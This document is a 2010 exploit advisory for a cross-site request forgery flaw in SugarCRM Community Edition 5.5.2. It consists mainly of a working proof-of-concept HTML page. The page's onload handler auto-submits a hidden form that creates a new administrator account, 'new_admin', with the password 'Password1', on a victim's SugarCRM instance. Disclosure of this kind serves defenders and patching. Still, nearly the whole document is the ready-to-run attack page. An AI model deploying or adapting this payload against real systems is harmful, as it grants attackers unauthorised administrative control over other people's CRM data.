<!--=========================================================================================================#
#   _      _   __   __       __        _______    _____      __ __     _____     _      _    _____  __ __    #
#  /_/\  /\_\ /\_\ /\_\     /\_\     /\_______)\ ) ___ (    /_/\__/\  ) ___ (   /_/\  /\_\ /\_____\/_/\__/\  #
#  ) ) )( ( ( \/_/( ( (    ( ( (     \(___  __\// /\_/\ \   ) ) ) ) )/ /\_/\ \  ) ) )( ( (( (_____/) ) ) ) ) #
# /_/ //\\ \_\ /\_\\ \_\    \ \_\      / / /   / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/  #
# \ \ /  \ / // / // / /__  / / /__   ( ( (    \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ /  \ / // /__/_\ \ \ \ \  #
#  )_) /\ (_(( (_(( (_____(( (_____(   \ \ \    \ \/_\/ /   )_) )    \ \/_\/ /  )_) /\ (_(( (_____\)_) ) \ \ #
#  \_\/  \/_/ \/_/ \/_____/ \/_____/   /_/_/     )_____(    \_\/      )_____(   \_\/  \/_/ \/_____/\_\/ \_\/ #
#                                                                                                            #
#============================================================================================================#
#                                                                                                            #
# Vulnerability............Cross-site Request Forgery                                                        #
# Software.................SugarCRM Community Edition 5.5.2                                                  #
# Download.................http://www.sugarcrm.com/crm/download/sugar-suite.html                             #
# Date.....................5/30/10                                                                           #
#                                                                                                            #
#============================================================================================================#
#                                                                                                            #
# Site.....................http://cross-site-scripting.blogspot.com/                                         #
# Email....................john.leitch5@gmail.com                                                            #
#                                                                                                            #
#============================================================================================================#
#                                                                                                            #
# ##Description##                                                                                            #
#                                                                                                            #
# A cross-site request forgery vulnerability in SugarCRM Community Edition 5.5.2 can be exploited to create  #
# a new admin.                                                                                               #
#                                                                                                            #
#                                                                                                            #
# ##Proof of Concept##                                                                                       #
#                                                                                                          -->
<html>
    <body onload="document.forms[0].submit()">
        <form method="POST" action="http://192.168.1.4/sugarcrm/index.php">
            <input type="hidden" name="display_tabs_def" value="display_tabs[]=Home&amp;display_tabs[]=Dashboard&amp;display_tabs[]=Calendar&amp;display_tabs[]=Activities&amp;display_tabs[]=Leads&amp;display_tabs[]=Contacts&amp;display_tabs[]=Accounts&amp;display_tabs[]=Opportunities&amp;display_tabs[]=Emails&amp;display_tabs[]=Campaigns&amp;display_tabs[]=Cases&amp;display_tabs[]=Documents&amp;" />
            <input type="hidden" name="hide_tabs_def" value="" />
            <input type="hidden" name="remove_tabs_def" value="" />
            <input type="hidden" name="module" value="Users" />
            <input type="hidden" name="record" value="" />
            <input type="hidden" name="action" value="Save" />
            <input type="hidden" name="page" value="EditView" />
            <input type="hidden" name="return_module" value="Users" />
            <input type="hidden" name="return_id" value="" />
            <input type="hidden" name="return_action" value="DetailView" />
            <input type="hidden" name="password_change" value="true" />
            <input type="hidden" name="required_password" value="1" />
            <input type="hidden" name="user_name" value="" />
            <input type="hidden" name="type" value="" />
            <input type="hidden" name="is_group" value="0" />
            <input type="hidden" name="portal_only" value="" />
            <input type="hidden" name="is_admin" value="1" />
            <input type="hidden" name="is_current_admin" value="1" />
            <input type="hidden" name="required_email_address" value="0" />
            <input type="hidden" name="sugar_user_name" value="new_admin" />
            <input type="hidden" name="unique_name" value="" />
            <input type="hidden" name="first_name" value="" />
            <input type="hidden" name="status" value="Active" />
            <input type="hidden" name="last_name" value="a" />
            <input type="hidden" name="UserType" value="Administrator" />
            <input type="hidden" name="old_password" value="" />
            <input type="hidden" name="new_password" value="Password1" />
            <input type="hidden" name="confirm_new_password" value="Password1" />
            <input type="hidden" name="emailAddressWidget" value="1" />
            <input type="hidden" name="emailAddress0" value="" />
            <input type="hidden" name="emailAddressPrimaryFlag" value="emailAddress0" />
            <input type="hidden" name="emailAddressVerifiedFlag0" value="true" />
            <input type="hidden" name="emailAddressVerifiedValue0" value="" />
            <input type="hidden" name="useEmailWidget" value="true" />
            <input type="hidden" name="email_link_type" value="sugar" />
            <input type="hidden" name="mail_smtpuser" value="" />
            <input type="hidden" name="mail_smtppass" value="" />
            <input type="hidden" name="employee_status" value="Active" />
            <input type="hidden" name="title" value="" />
            <input type="hidden" name="phone_work" value="" />
            <input type="hidden" name="department" value="" />
            <input type="hidden" name="phone_mobile" value="" />
            <input type="hidden" name="reports_to_name" value="" />
            <input type="hidden" name="reports_to_id" value="" />
            <input type="hidden" name="phone_other" value="" />
            <input type="hidden" name="phone_fax" value="" />
            <input type="hidden" name="phone_home" value="" />
            <input type="hidden" name="messenger_type" value="" />
            <input type="hidden" name="messenger_id" value="" />
            <input type="hidden" name="address_street" value="" />
            <input type="hidden" name="address_city" value="" />
            <input type="hidden" name="address_state" value="" />
            <input type="hidden" name="address_postalcode" value="" />
            <input type="hidden" name="address_country" value="" />
            <input type="hidden" name="description" value="" />
            <input type="hidden" name="receive_notifications" value="12" />
            <input type="hidden" name="export_delimiter" value="," />
            <input type="hidden" name="mailmerge_on" value="0" />
            <input type="hidden" name="reminder_time" value="60" />
            <input type="hidden" name="default_export_charset" value="ISO-8859-1" />
            <input type="hidden" name="user_max_tabs" value="12" />
            <input type="hidden" name="user_max_subtabs" value="12" />
            <input type="hidden" name="user_subpanel_tabs" value="on" />
            <input type="hidden" name="dateformat" value="m/d/Y" />
            <input type="hidden" name="currency" value="-99" />
            <input type="hidden" name="timeformat" value="H:i" />
            <input type="hidden" name="default_currency_significant_digits" value="2" />
            <input type="hidden" name="timezone" value="Africa/Abidjan" />
            <input type="hidden" name="ut" value="0" />
            <input type="hidden" name="num_grp_sep" value="," />
            <input type="hidden" name="default_locale_name_format" value="s f l" />
            <input type="hidden" name="dec_sep" value="." />
            <input type="hidden" name="calendar_publish_key" value="" />
            <input type="hidden" name="outboundtest_from_address" value="" />
        </form>
    </body>
</html>